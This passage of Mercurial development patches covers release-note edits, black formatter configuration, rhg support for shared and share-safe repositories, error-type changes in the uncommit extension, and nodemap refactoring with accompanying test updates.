The extension remains for compatibility. - - * `hg diff` and `hg extdiff` now support `--from <rev>` and `--to <rev>` - arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been - deprecated. - - * The memory footprint per changeset during pull/unbundle - operations has been further reduced. - - * There is a new internal merge tool called `internal:mergediff` (can - be set as the value for the `merge` config in the `[ui]` - section). It resolves merges the same was as `internal:merge` and - `internal:merge3`, but it shows conflicts differently. Instead of - showing 2 or 3 snapshots of the conflicting pieces of code, it - shows one snapshot and a diff. This may be useful when at least one - side of the conflict is similar to the base. The new marker style - is also supported by "premerge" as - `merge-tools.<tool>.premerge=keep-mergediff`. - - * External hooks are now called with `HGPLAIN=1` preset. - - * The `branchmap` cache is updated more intelligently and can be - significantly faster for repositories with many branches and changesets. - + * The `rev-branch-cache` is now updated incrementally whenever changesets are added. == New Experimental Features == -* `experimental.single-head-per-branch:public-changes-only` can be used - restrict the single head check to public revision. This is useful for - overlay repository that have both a publishing and non-publishing view - of the same storage. - == Bug Fixes == @@ -62,9 +15,6 @@ == Backwards Compatibility Changes == - * `--force-lock` and `--force-wlock` options on `hg debuglock` command are - renamed to `--force-free-lock` and `--force-free-wlock` respectively. 
- == Internal API Changes == # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1612217604 18000 # Mon Feb 01 17:13:24 2021 -0500 # Node ID 6b847757dd8d344ce1805e7230fddf8b1b6c2a83 # Parent 1c66795862cf76e985e7d187df2f5b04fc8c25fb relnotes: add entry for `hg diff --merge -c` Differential Revision: https://phab.mercurial-scm.org/D9944 diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -8,6 +8,11 @@ == New Experimental Features == + * `hg diff` now takes an experimental `--merge` flag which causes `hg + diff --change` to show the changes relative to an automerge for + merge changesets. This makes it easier to detect and review manual + changes performed in merge changesets. + == Bug Fixes == # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1612276538 -3600 # Tue Feb 02 15:35:38 2021 +0100 # Node ID 5be886200eb6594b763f89199f063432d55a0330 # Parent 6b847757dd8d344ce1805e7230fddf8b1b6c2a83 ci-fix: backed out changeset d4c8b4b90ecb This changeset is part of a series that breaks continuous integration on Python 2, and has been doing so for about a week. As no concrete solution has been found so far, the safest option seems to be to back it out until we can figure out the details.
Differential Revision: https://phab.mercurial-scm.org/D9947 diff --git a/black.toml b/black.toml new file mode 100644 --- /dev/null +++ b/black.toml @@ -0,0 +1,14 @@ +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black +black:command = black --config=black.toml - black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/pyproject.toml b/pyproject.toml --- a/pyproject.toml +++ b/pyproject.toml @@ -1,18 +1,3 @@ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" - -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -66,6 +66,7 @@ COPYING Makefile README.rst + black.toml hg hgeditor hgweb.cgi diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,5 @@ #require black test-repo $ cd $RUNTESTDIR/.. 
- $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1612276558 -3600 # Tue Feb 02 15:35:58 2021 +0100 # Node ID 1e26b882d7040f56c63c7e229f9d73629b70fc7b # Parent 5be886200eb6594b763f89199f063432d55a0330 ci-fix: backed out changeset 45afff0f530a This changeset is part of a series that breaks continuous integration on Python 2, and has been doing so for about a week. As no concrete solution has been found so far, the safest option seems to be to back it out until we can figure out the details. Differential Revision: https://phab.mercurial-scm.org/D9948 diff --git a/pyproject.toml b/pyproject.toml deleted file mode 100644 --- a/pyproject.toml +++ /dev/null @@ -1,3 +0,0 @@ -[build-system] -requires = ["setuptools", "wheel"] -build-backend = "setuptools.build_meta" diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -70,7 +70,6 @@ hg hgeditor hgweb.cgi - pyproject.toml rustfmt.toml setup.py # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1612281413 18000 # Tue Feb 02 10:56:53 2021 -0500 # Node ID 8214c71589f6273d8de2a615d4b8b86c6d51dbb3 # Parent 1e26b882d7040f56c63c7e229f9d73629b70fc7b tests: print the server error log in `test-url-download.t` There was a stray 500 error in CI, but no additional context to know what the issue was.
https://foss.heptapod.net/octobus/mercurial-devel/-/jobs/163093 Differential Revision: https://phab.mercurial-scm.org/D9949 diff --git a/tests/test-url-download.t b/tests/test-url-download.t --- a/tests/test-url-download.t +++ b/tests/test-url-download.t @@ -34,6 +34,8 @@ $ hg debugdownload ./null.txt 1 0000000000000000000000000000000000000000 + $ cat ../error.log + Test largefile URL ------------------ @@ -66,3 +68,5 @@ $ hg debugdownload "largefile://a57b57b39ee4dc3da1e03526596007f480ecdbe8" 1 0000000000000000000000000000000000000000 $ cd .. + + $ cat error.log # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612204228 -3600 # Mon Feb 01 19:30:28 2021 +0100 # Node ID f3f4d1b7dc979b902b4df1063a422959d16853d1 # Parent 8214c71589f6273d8de2a615d4b8b86c6d51dbb3 rhg: Add basic test with a shared repository Differential Revision: https://phab.mercurial-scm.org/D9940 diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -196,3 +196,67 @@ of $ rhg cat -r c3ae8dec9fad of r5000 + +Create a shared repository + + $ echo "[extensions]" >> $HGRCPATH + $ echo "share = " >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo1 + $ cd repo1 + $ echo a > a + $ hg commit -A -m'init' + adding a + + $ cd .. + $ hg share repo1 repo2 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ cd repo2 + $ rhg files + [252] + $ rhg cat -r 0 a + [252] + +Same with relative sharing + + $ cd .. + $ hg share repo2 repo3 --relative + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ cd repo3 + $ rhg files + [252] + $ rhg cat -r 0 a + [252] + +Same with share-safe + + $ echo "[format]" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo4 + $ cd repo4 + $ echo a > a + $ hg commit -A -m'init' + adding a + + $ cd ..
+ $ hg share repo4 repo5 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ cd repo5 + $ rhg files + [252] + $ rhg cat -r 0 a + [252] + # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610625852 -3600 # Thu Jan 14 13:04:12 2021 +0100 # Node ID d03b0601e0eb1b65262ca6d78116422f97a3090f # Parent f3f4d1b7dc979b902b4df1063a422959d16853d1 rhg: initial support for shared repositories Differential Revision: https://phab.mercurial-scm.org/D9941 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -40,6 +40,10 @@ // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html HgError::CorruptedRepository(explanation.into()) } + + pub fn unsupported(explanation: impl Into<String>) -> Self { + HgError::UnsupportedFeature(explanation.into()) + } } // TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,6 +1,8 @@ use crate::errors::{HgError, IoResultExt}; use crate::requirements; +use crate::utils::files::get_path_from_bytes; use memmap::{Mmap, MmapOptions}; +use std::collections::HashSet; use std::path::{Path, PathBuf}; /// A repository on disk @@ -8,6 +10,7 @@ working_directory: PathBuf, dot_hg: PathBuf, store: PathBuf, + requirements: HashSet<String>, } #[derive(Debug, derive_more::From)] @@ -32,15 +35,8 @@ let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. 
for ancestor in current_directory.ancestors() { - let dot_hg = ancestor.join(".hg"); - if dot_hg.is_dir() { - let repo = Self { - store: dot_hg.join("store"), - dot_hg, - working_directory: ancestor.to_owned(), - }; - requirements::check(&repo)?; - return Ok(repo); + if ancestor.join(".hg").is_dir() { + return Ok(Self::new_at_path(ancestor.to_owned())?); } } Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { @@ -48,10 +44,54 @@ }) } + /// To be called after checking that `.hg` is a sub-directory + fn new_at_path(working_directory: PathBuf) -> Result<Self, HgError> { + let dot_hg = working_directory.join(".hg"); + let hg_vfs = Vfs { base: &dot_hg }; + let reqs = requirements::load_if_exists(hg_vfs)?; + let relative = + reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT); + let shared = + reqs.contains(requirements::SHARED_REQUIREMENT) || relative; + let store_path; + if !shared { + store_path = dot_hg.join("store"); + } else { + let bytes = hg_vfs.read("sharedpath")?; + let mut shared_path = get_path_from_bytes(&bytes).to_owned(); + if relative { + shared_path = dot_hg.join(shared_path) + } + if !shared_path.is_dir() { + return Err(HgError::corrupted(format!( + ".hg/sharedpath points to nonexistent directory {}", + shared_path.display() + ))); + } + + store_path = shared_path.join("store"); + } + + let repo = Self { + requirements: reqs, + working_directory, + store: store_path, + dot_hg, + }; + + requirements::check(&repo)?; + + Ok(repo) + } + pub fn working_directory_path(&self) -> &Path { &self.working_directory } + pub fn requirements(&self) -> &HashSet<String> { + &self.requirements + } + /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). 
pub(crate) fn hg_vfs(&self) -> Vfs<'_> { diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,7 +1,8 @@ use crate::errors::{HgError, HgResultExt}; -use crate::repo::Repo; +use crate::repo::{Repo, Vfs}; +use std::collections::HashSet; -fn parse(bytes: &[u8]) -> Result<Vec<String>, HgError> { +fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> { // The Python code reading this file uses `str.splitlines` // which looks for a number of line separators (even including a couple of // non-ASCII ones), but Python code writing it always uses `\n`. @@ -21,10 +22,8 @@ .collect() } -pub fn load(repo: &Repo) -> Result<Vec<String>, HgError> { - if let Some(bytes) = - repo.hg_vfs().read("requires").io_not_found_as_none()? - { +pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? { parse(&bytes) } else { // Treat a missing file the same as an empty file. @@ -34,13 +33,13 @@ // > the repository. This file was introduced in Mercurial 0.9.2, // > which means very old repositories may not have one. We assume // > a missing file translates to no requirements. - Ok(Vec::new()) + Ok(HashSet::new()) } } -pub fn check(repo: &Repo) -> Result<(), HgError> { - for feature in load(repo)? { - if !SUPPORTED.contains(&&*feature) { +pub(crate) fn check(repo: &Repo) -> Result<(), HgError> { + for feature in repo.requirements() { + if !SUPPORTED.contains(&feature.as_str()) { // TODO: collect and all unknown features and include them in the // error message? return Err(HgError::UnsupportedFeature(format!( @@ -58,10 +57,77 @@ "fncache", "generaldelta", "revlogv1", - "sparserevlog", + SHARED_REQUIREMENT, + SPARSEREVLOG_REQUIREMENT, + RELATIVE_SHARED_REQUIREMENT, "store", // As of this writing everything rhg does is read-only. 
// When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: "persistent-nodemap", ]; + +// Copied from mercurial/requirements.py: + +/// When narrowing is finalized and no longer subject to format changes, +/// we should move this to just "narrow" or similar. +#[allow(unused)] +pub(crate) const NARROW_REQUIREMENT: &str = "narrowhg-experimental"; + +/// Enables sparse working directory usage +#[allow(unused)] +pub(crate) const SPARSE_REQUIREMENT: &str = "exp-sparse"; + +/// Enables the internal phase which is used to hide changesets instead +/// of stripping them +#[allow(unused)] +pub(crate) const INTERNAL_PHASE_REQUIREMENT: &str = "internal-phase"; + +/// Stores manifest in Tree structure +#[allow(unused)] +pub(crate) const TREEMANIFEST_REQUIREMENT: &str = "treemanifest"; + +/// Increment the sub-version when the revlog v2 format changes to lock out old +/// clients. +#[allow(unused)] +pub(crate) const REVLOGV2_REQUIREMENT: &str = "exp-revlogv2.1"; + +/// A repository with the sparserevlog feature will have delta chains that +/// can spread over a larger span. Sparse reading cuts these large spans into +/// pieces, so that each piece isn't too big. +/// Without the sparserevlog capability, reading from the repository could use +/// huge amounts of memory, because the whole span would be read at once, +/// including all the intermediate revisions that aren't pertinent for the +/// chain. This is why once a repository has enabled sparse-read, it becomes +/// required. +#[allow(unused)] +pub(crate) const SPARSEREVLOG_REQUIREMENT: &str = "sparserevlog"; + +/// A repository with the sidedataflag requirement will allow to store extra +/// information for revision without altering their original hashes. 
+#[allow(unused)] +pub(crate) const SIDEDATA_REQUIREMENT: &str = "exp-sidedata-flag"; + +/// A repository with the the copies-sidedata-changeset requirement will store +/// copies related information in changeset's sidedata. +#[allow(unused)] +pub(crate) const COPIESSDC_REQUIREMENT: &str = "exp-copies-sidedata-changeset"; + +/// The repository use persistent nodemap for the changelog and the manifest. +#[allow(unused)] +pub(crate) const NODEMAP_REQUIREMENT: &str = "persistent-nodemap"; + +/// Denotes that the current repository is a share +#[allow(unused)] +pub(crate) const SHARED_REQUIREMENT: &str = "shared"; + +/// Denotes that current repository is a share and the shared source path is +/// relative to the current repository root path +#[allow(unused)] +pub(crate) const RELATIVE_SHARED_REQUIREMENT: &str = "relshared"; + +/// A repository with share implemented safely. The repository has different +/// store and working copy requirements i.e. both `.hg/requires` and +/// `.hg/store/requires` are present. +#[allow(unused)] +pub(crate) const SHARESAFE_REQUIREMENT: &str = "exp-sharesafe"; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -2,7 +2,6 @@ use crate::error::CommandError; use crate::ui::Ui; use hg::repo::Repo; -use hg::requirements; pub const HELP_TEXT: &str = " Print the current repo requirements. @@ -20,8 +19,10 @@ fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; let mut output = String::new(); - for req in requirements::load(&repo)? 
{ - output.push_str(&req); + let mut requirements: Vec<_> = repo.requirements().iter().collect(); + requirements.sort(); + for req in requirements { + output.push_str(req); output.push('\n'); } ui.write_stdout(output.as_bytes())?; diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -218,9 +218,9 @@ $ cd repo2 $ rhg files - [252] + a $ rhg cat -r 0 a - [252] + a Same with relative sharing @@ -231,9 +231,9 @@ $ cd repo3 $ rhg files - [252] + a $ rhg cat -r 0 a - [252] + a Same with share-safe # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612176070 -3600 # Mon Feb 01 11:41:10 2021 +0100 # Node ID 95b276283b671cd835a2a0918f4297eb2baab425 # Parent d03b0601e0eb1b65262ca6d78116422f97a3090f rhg: add support for share-safe Differential Revision: https://phab.mercurial-scm.org/D9942 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -47,15 +47,34 @@ /// To be called after checking that `.hg` is a sub-directory fn new_at_path(working_directory: PathBuf) -> Result<Self, HgError> { let dot_hg = working_directory.join(".hg"); + let hg_vfs = Vfs { base: &dot_hg }; - let reqs = requirements::load_if_exists(hg_vfs)?; + let mut reqs = requirements::load_if_exists(hg_vfs)?; let relative = reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT); let shared = reqs.contains(requirements::SHARED_REQUIREMENT) || relative; + + // From `mercurial/localrepo.py`: + // + // if .hg/requires contains the sharesafe requirement, it means + // there exists a `.hg/store/requires` too and we should read it + // NOTE: presence of SHARESAFE_REQUIREMENT imply that store requirement + // is present. We never write SHARESAFE_REQUIREMENT for a repo if store + // is not present, refer checkrequirementscompat() for that + // + // However, if SHARESAFE_REQUIREMENT is not present, it means that the + // repository was shared the old way. 
We check the share source + // .hg/requires for SHARESAFE_REQUIREMENT to detect whether the + // current repository needs to be reshared + let share_safe = reqs.contains(requirements::SHARESAFE_REQUIREMENT); + let store_path; if !shared { store_path = dot_hg.join("store"); + if share_safe { + reqs.extend(requirements::load(Vfs { base: &store_path })?); + } } else { let bytes = hg_vfs.read("sharedpath")?; let mut shared_path = get_path_from_bytes(&bytes).to_owned(); @@ -70,6 +89,17 @@ } store_path = shared_path.join("store"); + + let source_is_share_safe = + requirements::load(Vfs { base: &shared_path })? + .contains(requirements::SHARESAFE_REQUIREMENT); + + // TODO: support for `share.safe-mismatch.*` config + if share_safe && !source_is_share_safe { + return Err(HgError::unsupported("share-safe downgrade")); + } else if source_is_share_safe && !share_safe { + return Err(HgError::unsupported("share-safe upgrade")); + } } let repo = Self { diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -22,6 +22,10 @@ .collect() } +pub(crate) fn load(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + parse(&hg_vfs.read("requires")?) +} + pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? { parse(&bytes) @@ -58,6 +62,7 @@ "generaldelta", "revlogv1", SHARED_REQUIREMENT, + SHARESAFE_REQUIREMENT, SPARSEREVLOG_REQUIREMENT, RELATIVE_SHARED_REQUIREMENT, "store", @@ -130,4 +135,4 @@ /// store and working copy requirements i.e. both `.hg/requires` and /// `.hg/store/requires` are present. 
#[allow(unused)] -pub(crate) const SHARESAFE_REQUIREMENT: &str = "exp-sharesafe"; +pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe"; diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -256,7 +256,7 @@ $ cd repo5 $ rhg files - [252] + a $ rhg cat -r 0 a - [252] + a # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611964260 28800 # Fri Jan 29 15:51:00 2021 -0800 # Node ID 0e2becd1fe0cd3f04518676798b95788a43b744c # Parent 95b276283b671cd835a2a0918f4297eb2baab425 errors: use InputError in uncommit extension Differential Revision: https://phab.mercurial-scm.org/D9911 diff --git a/hgext/uncommit.py b/hgext/uncommit.py --- a/hgext/uncommit.py +++ b/hgext/uncommit.py @@ -175,7 +175,7 @@ old = repo[b'.'] rewriteutil.precheck(repo, [old.rev()], b'uncommit') if len(old.parents()) > 1: - raise error.Abort(_(b"cannot uncommit merge changeset")) + raise error.InputError(_(b"cannot uncommit merge changeset")) match = scmutil.match(old, pats, opts) @@ -202,7 +202,7 @@ else: hint = _(b"file does not exist") - raise error.Abort( + raise error.InputError( _(b'cannot uncommit "%s"') % scmutil.getuipathfn(repo)(f), hint=hint, ) @@ -280,7 +280,7 @@ markers = list(predecessormarkers(curctx)) if len(markers) != 1: e = _(b"changeset must have one predecessor, found %i predecessors") - raise error.Abort(e % len(markers)) + raise error.InputError(e % len(markers)) prednode = markers[0].prednode() predctx = unfi[prednode] diff --git a/tests/test-unamend.t b/tests/test-unamend.t --- a/tests/test-unamend.t +++ b/tests/test-unamend.t @@ -39,7 +39,7 @@ $ hg unamend abort: changeset must have one predecessor, found 0 predecessors - [255] + [10] Unamend on clean wdir and tip diff --git a/tests/test-uncommit.t b/tests/test-uncommit.t --- a/tests/test-uncommit.t +++ b/tests/test-uncommit.t @@ -114,12 +114,12 @@ $ hg uncommit nothinghere abort: cannot uncommit "nothinghere" (file does not exist) - [255] + [10] $ 
hg status $ hg uncommit file-abc abort: cannot uncommit "file-abc" (file was not changed in working directory parent) - [255] + [10] $ hg status Try partial uncommit, also moves bookmark @@ -419,7 +419,7 @@ $ hg uncommit abort: cannot uncommit merge changeset - [255] + [10] $ hg status $ hg log -G -T '{rev}:{node} {desc}' --hidden @@ -585,12 +585,12 @@ $ hg uncommit emptydir abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ cd emptydir $ hg uncommit . abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ hg status $ cd .. # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1611564827 -19800 # Mon Jan 25 14:23:47 2021 +0530 # Node ID 3e3b81b6e7da5fdf8250c0ef7e4c5df0f954ca91 # Parent 0e2becd1fe0cd3f04518676798b95788a43b744c debugcommands: s/stdin/stdout in debugnodemap help Differential Revision: https://phab.mercurial-scm.org/D9930 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -2212,9 +2212,9 @@ b'', b'dump-new', False, - _(b'write a (new) persistent binary nodemap on stdin'), + _(b'write a (new) persistent binary nodemap on stdout'), ), - (b'', b'dump-disk', False, _(b'dump on-disk data on stdin')), + (b'', b'dump-disk', False, _(b'dump on-disk data on stdout')), ( b'', b'check', # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612114988 -19800 # Sun Jan 31 23:13:08 2021 +0530 # Node ID 45c3a263d5d1464aa61e59f4d376a5fd9438125a # Parent 3e3b81b6e7da5fdf8250c0ef7e4c5df0f954ca91 engine: 'if not, else' -> 'if, else' I personally feel that ``` if x: pass else: pass ``` is easier to read and edit than ``` if not x: pass else: pass ``` Next patches will add one more if-else clause. 
Differential Revision: https://phab.mercurial-scm.org/D9931 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -449,7 +449,10 @@ ) ) - if not upgrade_op.requirements_only: + if upgrade_op.requirements_only: + ui.status(_(b'upgrading repository requirements\n')) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + else: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( ui, @@ -532,8 +535,5 @@ # could update srcrepo.svfs and other variables to point to the new # location. This is simpler. backupvfs.unlink(b'store/lock') - else: - ui.status(_(b'upgrading repository requirements\n')) - scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) return backuppath # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612116299 -19800 # Sun Jan 31 23:34:59 2021 +0530 # Node ID 83f037acf71a8773c88a597c7ea35cb572147d7e # Parent 45c3a263d5d1464aa61e59f4d376a5fd9438125a nodemap: make `_persist_nodemap` a public function I will like to have a utility function using which we can directly write out nodemap for a repository without going through the recloning process. This function seems like the one containing important pieces for that. Let's make it public. 
Differential Revision: https://phab.mercurial-scm.org/D9932 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -81,9 +81,9 @@ if tr.hasfinalize(callback_id): return # no need to register again tr.addpending( - callback_id, lambda tr: _persist_nodemap(tr, revlog, pending=True) + callback_id, lambda tr: persist_nodemap(tr, revlog, pending=True) ) - tr.addfinalize(callback_id, lambda tr: _persist_nodemap(tr, revlog)) + tr.addfinalize(callback_id, lambda tr: persist_nodemap(tr, revlog)) class _NoTransaction(object): @@ -123,12 +123,12 @@ return # we do not use persistent_nodemap on this revlog notr = _NoTransaction() - _persist_nodemap(notr, revlog) + persist_nodemap(notr, revlog) for k in sorted(notr._postclose): notr._postclose[k](None) -def _persist_nodemap(tr, revlog, pending=False): +def persist_nodemap(tr, revlog, pending=False): """Write nodemap data on disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): raise error.ProgrammingError( # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612116511 -19800 # Sun Jan 31 23:38:31 2021 +0530 # Node ID 835aafb2543f8354382e95b931d532595e96017f # Parent 83f037acf71a8773c88a597c7ea35cb572147d7e revlog: refactor logic to compute nodemap file in separate function I will like to use it one more place. 
Differential Revision: https://phab.mercurial-scm.org/D9933 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -448,14 +448,9 @@ self.datafile = datafile or (indexfile[:-2] + b".d") self.nodemap_file = None if persistentnodemap: - if indexfile.endswith(b'.a'): - pending_path = indexfile[:-4] + b".n.a" - if opener.exists(pending_path): - self.nodemap_file = pending_path - else: - self.nodemap_file = indexfile[:-4] + b".n" - else: - self.nodemap_file = indexfile[:-2] + b".n" + self.nodemap_file = nodemaputil.get_nodemap_file( + opener, self.indexfile + ) self.opener = opener # When True, indexfile is opened with checkambig=True at writing, to diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -634,3 +634,14 @@ if isinstance(entry, dict): return _find_node(entry, node[1:]) return entry + + +def get_nodemap_file(opener, indexfile): + if indexfile.endswith(b'.a'): + pending_path = indexfile[:-4] + b".n.a" + if opener.exists(pending_path): + return pending_path + else: + return indexfile[:-4] + b".n" + else: + return indexfile[:-2] + b".n" # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612116657 -19800 # Sun Jan 31 23:40:57 2021 +0530 # Node ID dadb4db55661192aa3ee0f51bd3cdd24b80d4b15 # Parent 835aafb2543f8354382e95b931d532595e96017f nodemap: fix a typo in error message Differential Revision: https://phab.mercurial-scm.org/D9934 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -135,7 +135,7 @@ "cannot persist nodemap of a filtered changelog" ) if revlog.nodemap_file is None: - msg = "calling persist nodemap on a revlog without the feature enableb" + msg = "calling persist nodemap on a revlog without the feature enabled" raise error.ProgrammingError(msg) can_incremental 
= util.safehasattr(revlog.index, "nodemap_data_incremental") # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612118427 -19800 # Mon Feb 01 00:10:27 2021 +0530 # Node ID bfaacfa8ebfc5c686080ef882b7b6b57a558d68d # Parent dadb4db55661192aa3ee0f51bd3cdd24b80d4b15 tests: unquiet a test to show changes in next patch Differential Revision: https://phab.mercurial-scm.org/D9935 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -617,18 +617,42 @@ plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default - $ hg debugupgraderepo --run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store added: persistent-nodemap + persistent-nodemap + Speedup revision lookup by node id. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... 
+ repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + migrating 15018 total revisions (5006 in filelogs, 5006 in manifests, 5006 in changelog) + migrating 1.74 MB in store; 569 MB tracked data + migrating 5004 filelogs containing 5006 revisions (346 KB in store; 28.2 KB tracked data) + finished migrating 5006 filelog revisions across 5004 filelogs; change in size: 0 bytes + migrating 1 manifests containing 5006 revisions (765 KB in store; 569 MB tracked data) + finished migrating 5006 manifest revisions across 1 manifests; change in size: 0 bytes + migrating changelog containing 5006 revisions (673 KB in store; 363 KB tracked data) + finished migrating 5006 changelog revisions; change in size: 0 bytes + finished migrating 15018 total revisions; total change in store size: 0 bytes + copying phaseroots + data fully upgraded in a temporary repository + marking source repository as being upgraded; clients will be unable to read from repository + starting in-place swap of repository data + replacing store... 
